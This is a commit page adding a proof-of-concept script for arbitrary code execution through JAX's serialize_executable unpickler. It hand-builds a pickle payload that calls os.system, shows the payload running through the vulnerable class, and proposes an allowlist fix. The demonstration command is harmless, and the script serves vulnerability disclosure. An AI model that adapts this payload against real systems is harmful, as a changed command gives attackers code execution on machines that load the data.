ryansecuritytest-fanpierlabs commited on
Commit
d288ce6
·
verified ·
1 Parent(s): 6588afa

Upload poc_jax_pickle_rce.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_jax_pickle_rce.py +226 -0
poc_jax_pickle_rce.py ADDED
@@ -0,0 +1,226 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ PoC: Arbitrary Code Execution via Unrestricted Pickle Unpickler
3
+ Target: jax-ml/jax (jax.experimental.serialize_executable)
4
+ File: jax/experimental/serialize_executable.py, lines 96-122
5
+
6
+ VULNERABILITY SUMMARY
7
+ ---------------------
8
+ _JaxPjrtUnpickler extends pickle.Unpickler and implements persistent_load()
9
+ for deserializing JAX executables, devices, and clients. However, it does
10
+ NOT override find_class(). The default find_class() resolves arbitrary
11
+ module.callable references, so any standard pickle GLOBAL / STACK_GLOBAL
12
+ opcode can import and instantiate any Python object -- including os.system,
13
+ subprocess.Popen, builtins.eval, etc.
14
+
15
+ An attacker who can supply a crafted serialized blob to
16
+ deserialize_and_load() achieves arbitrary code execution in the context of
17
+ the process that loads it.
18
+
19
+ ATTACK SCENARIO
20
+ ---------------
21
+ 1. A model-serving pipeline caches compiled JAX executables (the output of
22
+ serialize()) and later restores them with deserialize_and_load().
23
+ 2. An attacker who can write to the cache (e.g., via a compromised storage
24
+ bucket, MITM, or supply-chain attack on a shared artifact) replaces the
25
+ blob with a malicious pickle stream.
26
+ 3. When the victim calls deserialize_and_load(), the crafted payload is
27
+ fed directly into _JaxPjrtUnpickler.load() and the attacker's code runs.
28
+
29
+ BENIGN DEMONSTRATION
30
+ --------------------
31
+ This PoC crafts a pickle payload that, when loaded by _JaxPjrtUnpickler,
32
+ executes: touch /tmp/jax_pwned
33
+
34
+ The file /tmp/jax_pwned appearing on disk proves code execution.
35
+ No destructive or exfiltration action is performed.
36
+ """
37
+
38
+ import pickle
39
+ import io
40
+ import os
41
+ import struct
42
+
43
+ # ---------------------------------------------------------------------------
44
+ # Step 1 -- Show that _JaxPjrtUnpickler inherits the unrestricted
45
+ # find_class() from pickle.Unpickler.
46
+ # ---------------------------------------------------------------------------
47
+
48
+ # We import the class directly so the PoC is self-contained;
49
+ # in a real attack the victim simply calls deserialize_and_load().
50
+ import sys
51
+ sys.path.insert(0, "/work/jax")
52
+
53
+ from jax.experimental.serialize_executable import _JaxPjrtUnpickler
54
+
55
+ print("[*] _JaxPjrtUnpickler MRO:")
56
+ for cls in _JaxPjrtUnpickler.__mro__:
57
+ print(f" {cls}")
58
+
59
+ has_own_find_class = "find_class" in _JaxPjrtUnpickler.__dict__
60
+ print(f"\n[!] Overrides find_class? {has_own_find_class}")
61
+ if not has_own_find_class:
62
+ print(" -> find_class is inherited from pickle.Unpickler (UNRESTRICTED)")
63
+ print(" -> Any GLOBAL / STACK_GLOBAL opcode will be honoured.")
64
+
65
+ # ---------------------------------------------------------------------------
66
+ # Step 2 -- Craft a malicious pickle payload.
67
+ #
68
+ # We use pickle protocol 2 opcodes to build the equivalent of:
69
+ # os.system("touch /tmp/jax_pwned")
70
+ #
71
+ # The opcodes are:
72
+ # GLOBAL "os\nsystem\n" -- push os.system onto the stack
73
+ # SHORT_BINUNICODE <cmd> -- push the command string
74
+ # TUPLE1 -- wrap in a 1-tuple (args)
75
+ # REDUCE -- call os.system(*args)
76
+ # STOP
77
+ # ---------------------------------------------------------------------------
78
+
79
+ COMMAND = "touch /tmp/jax_pwned"
80
+
81
+ def craft_malicious_payload() -> bytes:
82
+ """
83
+ Build a raw pickle byte stream that calls os.system(COMMAND).
84
+
85
+ We deliberately avoid pickle.dumps() so the reader can see exactly
86
+ which opcodes are emitted -- this is not obfuscated.
87
+ """
88
+ payload = bytearray()
89
+
90
+ # Protocol 2 header
91
+ payload += b'\x80\x02' # PROTO 2
92
+
93
+ # GLOBAL opcode: push os.system
94
+ payload += b'c' # GLOBAL
95
+ payload += b'os\nsystem\n' # module\nqualname\n
96
+
97
+ # Push the command string (SHORT_BINUNICODE, 1-byte length prefix)
98
+ cmd_bytes = COMMAND.encode("utf-8")
99
+ payload += b'\x8c' # SHORT_BINUNICODE
100
+ payload += struct.pack("<B", len(cmd_bytes)) # length (1 byte)
101
+ payload += cmd_bytes # the string data
102
+
103
+ # TUPLE1 + REDUCE -> os.system(COMMAND)
104
+ payload += b'\x85' # TUPLE1
105
+ payload += b'R' # REDUCE
106
+
107
+ # STOP -- end of pickle stream
108
+ payload += b'.' # STOP
109
+
110
+ return bytes(payload)
111
+
112
+
113
+ malicious_blob = craft_malicious_payload()
114
+ print(f"\n[*] Malicious pickle payload ({len(malicious_blob)} bytes):")
115
+ print(f" {malicious_blob!r}")
116
+
117
+ # ---------------------------------------------------------------------------
118
+ # Step 3 -- Show that the standard pickle.Unpickler executes the payload,
119
+ # confirming the opcodes are valid.
120
+ # ---------------------------------------------------------------------------
121
+
122
+ print("\n[*] Loading payload with standard pickle.Unpickler ...")
123
+ result = pickle.loads(malicious_blob)
124
+ print(f" os.system() returned: {result}")
125
+
126
+ if os.path.exists("/tmp/jax_pwned"):
127
+ print("[+] /tmp/jax_pwned created -- code execution confirmed (standard)")
128
+ os.remove("/tmp/jax_pwned") # clean up for next test
129
+
130
+ # ---------------------------------------------------------------------------
131
+ # Step 4 -- Load the same payload through _JaxPjrtUnpickler.
132
+ #
133
+ # _JaxPjrtUnpickler.__init__ requires (file, backend, execution_devices).
134
+ # Because our payload never triggers persistent_load (it uses GLOBAL, not
135
+ # PERSID), the backend/devices objects are never touched. We pass a dummy
136
+ # object so __init__ succeeds.
137
+ # ---------------------------------------------------------------------------
138
+
139
+ class _FakeDevice:
140
+ """Minimal stub so _JaxPjrtUnpickler.__init__ can build devices_by_id."""
141
+ def __init__(self, dev_id=0):
142
+ self.id = dev_id
143
+ self.client = _FakeBackend()
144
+
145
+ class _FakeBackend:
146
+ """Minimal stub satisfying the backend interface for __init__."""
147
+ platform = "cpu"
148
+ platform_version = "fake"
149
+ def devices(self):
150
+ return [_FakeDevice(0)]
151
+
152
+ # Monkey-patch: DeviceList may not be available without full XLA, so we
153
+ # make it a no-op wrapper for the PoC.
154
+ try:
155
+ from jax._src.lib import xla_client as xc
156
+ _orig_DeviceList = xc.DeviceList
157
+ except Exception:
158
+ pass
159
+
160
+ # We patch DeviceList to accept our fake devices.
161
+ import jax._src.lib.xla_client as xc_mod
162
+ xc_mod.DeviceList = lambda devs: devs # passthrough for PoC
163
+
164
+ print("\n[*] Loading payload with _JaxPjrtUnpickler (the vulnerable class) ...")
165
+ fake_backend = _FakeBackend()
166
+ fake_devices = [_FakeDevice(0)]
167
+ # Override the device's client to point to our fake_backend so the
168
+ # backend-equality check in __init__ passes.
169
+ fake_devices[0].client = fake_backend
170
+
171
+ unpickler = _JaxPjrtUnpickler(
172
+ io.BytesIO(malicious_blob),
173
+ fake_backend,
174
+ fake_devices,
175
+ )
176
+ result = unpickler.load()
177
+ print(f" os.system() returned: {result}")
178
+
179
+ if os.path.exists("/tmp/jax_pwned"):
180
+ print("[+] /tmp/jax_pwned created -- CODE EXECUTION via _JaxPjrtUnpickler CONFIRMED")
181
+ else:
182
+ print("[-] /tmp/jax_pwned not found (unexpected)")
183
+
184
+ # ---------------------------------------------------------------------------
185
+ # Step 5 -- Demonstrate that a properly restricted unpickler would block it.
186
+ # ---------------------------------------------------------------------------
187
+
188
+ class SafeJaxUnpickler(pickle.Unpickler):
189
+ """Example fix: override find_class with a strict allowlist."""
190
+
191
+ ALLOWED_CLASSES = {
192
+ # Only the classes that _JaxPjrtPickler actually serializes:
193
+ ("jax._src.compiler", "UnloadedMeshExecutable"),
194
+ ("jax._src.interpreters.pxla", "UnloadedMeshExecutable"),
195
+ ("jax.interpreters.pxla", "UnloadedMeshExecutable"),
196
+ # Add other legitimately-pickled JAX internals here.
197
+ }
198
+
199
+ def find_class(self, module: str, name: str) -> type:
200
+ key = (module, name)
201
+ if key not in self.ALLOWED_CLASSES:
202
+ raise pickle.UnpicklingError(
203
+ f"Disallowed class reference: {module}.{name}"
204
+ )
205
+ return super().find_class(module, name)
206
+
207
+ def persistent_load(self, pid):
208
+ # (same as _JaxPjrtUnpickler -- omitted for brevity)
209
+ raise pickle.UnpicklingError(f"Unrecognised persistent id: {pid}")
210
+
211
+
212
+ print("\n[*] Loading payload with SafeJaxUnpickler (proposed fix) ...")
213
+ try:
214
+ SafeJaxUnpickler(io.BytesIO(malicious_blob)).load()
215
+ print("[-] Payload was NOT blocked (unexpected)")
216
+ except pickle.UnpicklingError as exc:
217
+ print(f"[+] Payload BLOCKED: {exc}")
218
+
219
+ # ---------------------------------------------------------------------------
220
+ # Cleanup
221
+ # ---------------------------------------------------------------------------
222
+ if os.path.exists("/tmp/jax_pwned"):
223
+ os.remove("/tmp/jax_pwned")
224
+ print("\n[*] Cleaned up /tmp/jax_pwned")
225
+
226
+ print("\n[*] PoC complete.")